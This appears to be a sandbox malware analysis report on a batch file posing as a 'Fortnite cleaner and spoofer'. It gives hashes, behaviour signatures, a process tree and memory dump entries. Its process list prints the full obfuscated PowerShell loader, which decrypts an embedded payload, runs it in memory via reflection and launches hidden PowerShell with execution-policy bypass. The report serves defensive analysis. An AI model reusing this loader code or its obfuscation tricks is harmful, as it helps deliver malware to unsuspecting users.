Analysis

  • max time kernel
    118s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    29-12-2024 21:53

General

  • Target

    FortniteCleaner and Spoofer.bat

  • Size

    11.7MB

  • MD5

    2633869ac4a9cb98b01488ac2cb20d72

  • SHA1

    167871fab0a19acaf7ad22144d8fdb5b09959a28

  • SHA256

    6a52f0cf77b3706de713eff3d7e038ff13d5ca7c8fc837f4eee0adac079cf522

  • SHA512

    f4d48d8e672d828c79b65b886c1ca3a423701cd6a8077c0ab78c4d2e60284ed505fc971975beab3e79bd9b9c20f821b52111258642c8bbb4024891a343004543

  • SSDEEP

    49152:z+8TuE0MoXJ8qRdxr47sbd6rBJYqfpbAgpK64KspQPEf+UWONvGFni6xha3DrNG0:k

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\FortniteCleaner and Spoofer.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3040
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo function wxtqr($ODxam){ $yFHSw=[System.Security.Cryptography.Aes]::Create(); $yFHSw.Mode=[System.Security.Cryptography.CipherMode]::CBC; $yFHSw.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $yFHSw.Key=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))('MlS5vgEV14RQQ3ZEfZqUBeQcgrXfss4V2pUy4tjwV1I='); $yFHSw.IV=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))('nxrFwGMsIIo9SFRZFcB28A=='); $maSQj=$yFHSw.CreateDecryptor(); $return_var=$maSQj.TransformFinalBlock($ODxam, 0, $ODxam.Length); $maSQj.Dispose(); $yFHSw.Dispose(); $return_var;}function WDxBz($ODxam){ $GXRNP=New-Object System.IO.MemoryStream(,$ODxam); $ruNFB=New-Object System.IO.MemoryStream; Invoke-Expression '$PBbkq #=# #N#e#w#-#O#b#j#e#c#t# #S#y#s#t#e#m#.#I#O#.#C#o#m#p#r#e#s#s#i#o#n#.#G#Z#i#p#S#t#r#e#a#m#(#$GXRNP,# #[#I#O#.#C#o#m#p#r#e#s#s#i#o#n#.#C#o#m#p#r#e#s#s#i#o#n#M#o#d#e#]#:#:#D#e#c#o#m#p#r#e#s#s#)#;#'.Replace('#', ''); $PBbkq.CopyTo($ruNFB); $PBbkq.Dispose(); $GXRNP.Dispose(); $ruNFB.Dispose(); $ruNFB.ToArray();}function HXYOu($ODxam,$waUGN){ $agWIT = @( '$XEdTc = [System.#R#e#f#l#e#c#t#i#o#n#.Assembly]::("@L@o@a@d@".Replace("@", ""))([byte[]]$ODxam);'.Replace("#", ""), '$PzJKk = $XEdTc.EntryPoint;', '$PzJKk.Invoke($null, $waUGN);' ); foreach ($ayBSI in $agWIT) { Invoke-Expression $ayBSI };}$ulpxy=[System.IO.File]::("@R@e@a@d@A@l@l@T@e@x@t@".Replace("@", ""))('C:\Users\Admin\AppData\Local\Temp\FortniteCleaner and Spoofer.bat').Split([Environment]::NewLine);foreach ($WdBTO in $ulpxy) { if ($WdBTO.StartsWith('SIROXEN')) { $xSKPu=$WdBTO.Substring(7); break; }}$NWMte=WDxBz (wxtqr ([Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))($xSKPu)));HXYOu $NWMte (,[string[]] ('C:\Users\Admin\AppData\Local\Temp\FortniteCleaner and Spoofer.bat')); "
      2⤵
        PID:2204
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -noprofile -windowstyle hidden
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2164

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/2164-4-0x000007FEF61EE000-0x000007FEF61EF000-memory.dmp

      Filesize

      4KB

    • memory/2164-5-0x000000001B690000-0x000000001B972000-memory.dmp

      Filesize

      2.9MB

    • memory/2164-7-0x000007FEF5F30000-0x000007FEF68CD000-memory.dmp

      Filesize

      9.6MB

    • memory/2164-8-0x000007FEF5F30000-0x000007FEF68CD000-memory.dmp

      Filesize

      9.6MB

    • memory/2164-9-0x000007FEF5F30000-0x000007FEF68CD000-memory.dmp

      Filesize

      9.6MB

    • memory/2164-6-0x0000000001F00000-0x0000000001F08000-memory.dmp

      Filesize

      32KB

    • memory/2164-10-0x000007FEF5F30000-0x000007FEF68CD000-memory.dmp

      Filesize

      9.6MB

    • memory/2164-11-0x000007FEF61EE000-0x000007FEF61EF000-memory.dmp

      Filesize

      4KB

    • memory/2164-12-0x000007FEF5F30000-0x000007FEF68CD000-memory.dmp

      Filesize

      9.6MB